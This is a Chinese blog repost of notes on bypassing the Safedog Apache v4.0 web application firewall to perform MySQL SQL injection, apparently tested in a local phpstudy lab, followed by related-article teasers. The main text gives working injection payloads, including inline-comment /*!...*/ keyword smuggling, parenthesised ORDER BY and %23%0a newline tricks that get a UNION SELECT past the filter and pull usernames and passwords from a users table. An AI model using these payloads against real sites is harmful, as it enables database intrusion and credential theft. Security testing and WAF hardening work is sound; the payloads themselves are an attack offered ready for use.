最新安全狗 apache v4.0 sql注入 bypass

最新推荐文章于 2023-03-26 16:53:57 发布
最新推荐文章于 2023-03-26 16:53:57 发布
阅读量320 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/hac425/p/10147740.html
版权

前言

最近没事学习一下 wafbypass , 本文介绍下 bypass 安全狗的笔记。个人感觉 bypass 的总思路(正则匹配型 waf)就是利用各种语法特性来逃避正则(当然要保证语法正确性的前提下)

测试环境:

phpstudy  + 安全狗Apache版 V4.0、
burp + hackvertor 插件

判断注入

判断字符型注入还是数字型

往数字后面加若干个字母,如果结果不变应该是字符型注入,因为 mysql 的弱类型会把 1xxxx 转换成 1

006daSSqgy1fycznuknifj30xt0azmz8.jpg

引入逻辑表达式进行判断

利用 Mysql 支持的 /*!*/ 语法引入 && 绕过过滤

1'/*!&&*/1#'

006daSSqgy1fyczoagz14j314c0mh0zc.jpg

order by 获取列数

还是利用 /*!*/ 语法来引入关键字, 然后利用 () 包裹数字绕过空格进而绕过正则。

1'/*!&&*/0/*!order*/by(2)#'

006daSSqgy1fyczoyed5gj312m0kndle.jpg

所以有 2 列。

绕过 union

%23%0a 绕过正则, 原因大概是 # 是注释符号(只注释一行 \n 截止), waf 认为后面的都是注释不去匹配,而 mysql 支持使用 \n 代替空格,所以绕过了正则。

<@urlencode_1>1'/*!&&*/0/*! union*//*!all*/<@/urlencode_1>%23%0a<@urlencode_2>/*! sElect*/1,@@HOSTNAME#'<@/urlencode_2>

006daSSqgy1fyczphsd6wj318s0iytc5.jpg

拿密码

使用 %23%0a ,绕过正则

<@urlencode_1>1'/*!&&*/0/*! union*//*!all*/<@/urlencode_1>%23%0a<@urlencode_2>/*! sElect*/user,password <@/urlencode_2>from%23%0a<@urlencode_3>users where user_id=1<@/urlencode_3>%23%27

006daSSqgy1fyczps57xqj31f10hudjw.jpg

转载于:https://www.cnblogs.com/hac425/p/10147740.html

weixin_30417487
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 290
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 3434
Safedog 4.0 bypass绕过
[CVE-2020-9483/13921]Apache SkyWalking SQL注入
公众号shadow sock7
08-07 2806
参考: https://www.weibo.com/ttarticle/p/show?id=2309404520814409023617 编译好的6.5.0版本: wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz cd apache-skywalking-apm-bin/bin vi oapService.sh 加上调试参数: DEBUG_OPTIONS="-agentlib
Apache-Skywalking-SQL注入(CVE-2020-9483)复现
weixin_42558965的博客
10-08 1201
漏洞描述 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。当Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apac
SQL注入-过安全狗apache4.0
m0_60716947的博客
05-15 943
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
sql注入高级
01-11
了解丌同数据库注入以及注入的类型,比如select注入,insert注入, json注入,一些注入防护代码等等。 了解及学习注入绕过的手法,掌握服务器,应用,数据库的bypass 手法,学会编写bypass waf代码 。
sql-bypass靶场
最新发布
03-19
SQL注入SQL Injection)与Bypass技巧】 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在输入字段中插入恶意的SQL代码来操纵数据库。在"sql-bypass靶场"中,我们面对的是一个带有过滤机制的SQL注入场景,...
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
0x01 环境搭建360主机卫士官网:http://zhuji.360.cn 软件版本:360主机卫士Apache 纪念版 测试环境:phpStudy本地构造S
我的WafBypass之道(SQL注入篇).pdf
08-07
总结一些学习和培养突破waf的思想
绕过安全狗(Apache 4.0.30255)——SQL注入(上)
m0_51330619的博客
09-23 1053
4.0.30255 首先测试是否是注入点 这里应该是and被过滤了 尝试用大小写与双写都不行,想想也是,安全狗也没那么笨 然后尝试用&&代替and 于是乎就成功判断出注入点咯,接下来order by判断列数 1' order by 3# 判断为2列,于是union联合注入查询咯 1' union select 1,2# 被拦截了奥,现在需要找到是什么函数被拦截了 1’ union # 不拦截 1’ select 1,2# 不拦截 1’ un
SQL-Bypass安全狗4.0
weixin_45716091的博客
10-21 416
实验环境: sqli-labs 网站安全狗Linux-Apache版 版本:V2.3.18809 CentOS7+宝塔面板 apache+php+mysql 注意: 安全狗需要开启记录并拦截,否则只会记录不会拦截,没有弹窗。 这里以sqli-labs的Less-1为例。 判断注入 存在字符型注入。如果没有错误回显,可以输入payload:?id=2-1 等等来判断。 Fuzz: 1' --+- 未拦截(不拦截注释符) 1' and '1'='1 拦截 1' and 1=1 .
小肚皮最新版本_安全狗4.0版本SQL注入绕过一点小技巧,最新20201027官网版本可用...
weixin_30977095的博客
12-30 124
0x00 前言安全狗的安装和环境的搭建过程就不在此赘述了,安全狗的版本是此文章撰写当天官网下载安装的,注入环境采用的是老生常谈的Sqlilabs的第一关。文中手法可能已经有大佬搞过了,甚至写过文章了,请大佬手下留情。废话不多说,上菜。0x01 注入点检测绕过先上一张没有绕过的图经过测试and不会拦截,但是加数字就会拦截,因此,在数字上动手脚,使用/*!500001*/测试绕过,具体操作如...
全方位绕过安全狗
weixin_34341117的博客
07-06 252
一、前言     安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下面为大家一一介绍。 二、测试环境     本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网站安全狗IIS版3.2.08417 三、SQL注入绕...
sql注入大全
Little Luck
01-19 1072
* 确认数据库类型 (只有MYSQL解析/*)1.  and ord(mid(version(),1,1))>51                   /* 确认数据库版本 51是ASCII码3 正确则>4.0 错误则2. union select 1,1,1,****1,1                              /*返回正确 确认字段数3.order by 13      
SQL注入_Bypass安全狗apache主程序版本v4.0.23137绕过
crowsec
03-20 2609
更新时间:2021.10.21 微信公众号:乌鸦安全 说明 本文发在乌鸦安全知识星球,仅限内部使用! 1. 版本 当前版本是最新安全狗 主程序版本号为:v4.0.23137 上一次的版本为 主程序版本号为:v4.0.26655 所以这次已经对安全狗进行了升级。 2. 开始绕 按照ling老板的笔记,继续: 关键:/*//------/*/ 安全狗 order by 绕过id=1%27%20order%20/*//------/*/--+%20%0Aby%203--+s 精简版:id=1%27%20
[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0
weixin_33753845的博客
05-27 157
[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入" 1.“php+mysql+apache”环境搭建 环境载体:虚拟机Window7 Service Pack 1 旗舰版 下载“phpStudy (php5.2) ” 链接:http://www.phpstudy.net/phpstudy/phpStudy(PHP5.2)...
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1199
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
SQL注入实验
xiongIT的博客
10-29 2631
SQL注入实验和站在防御者角度该怎么预防Sql注入
SQL_BypassWaf.pdf
04-08
SQL_BypassWaf.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值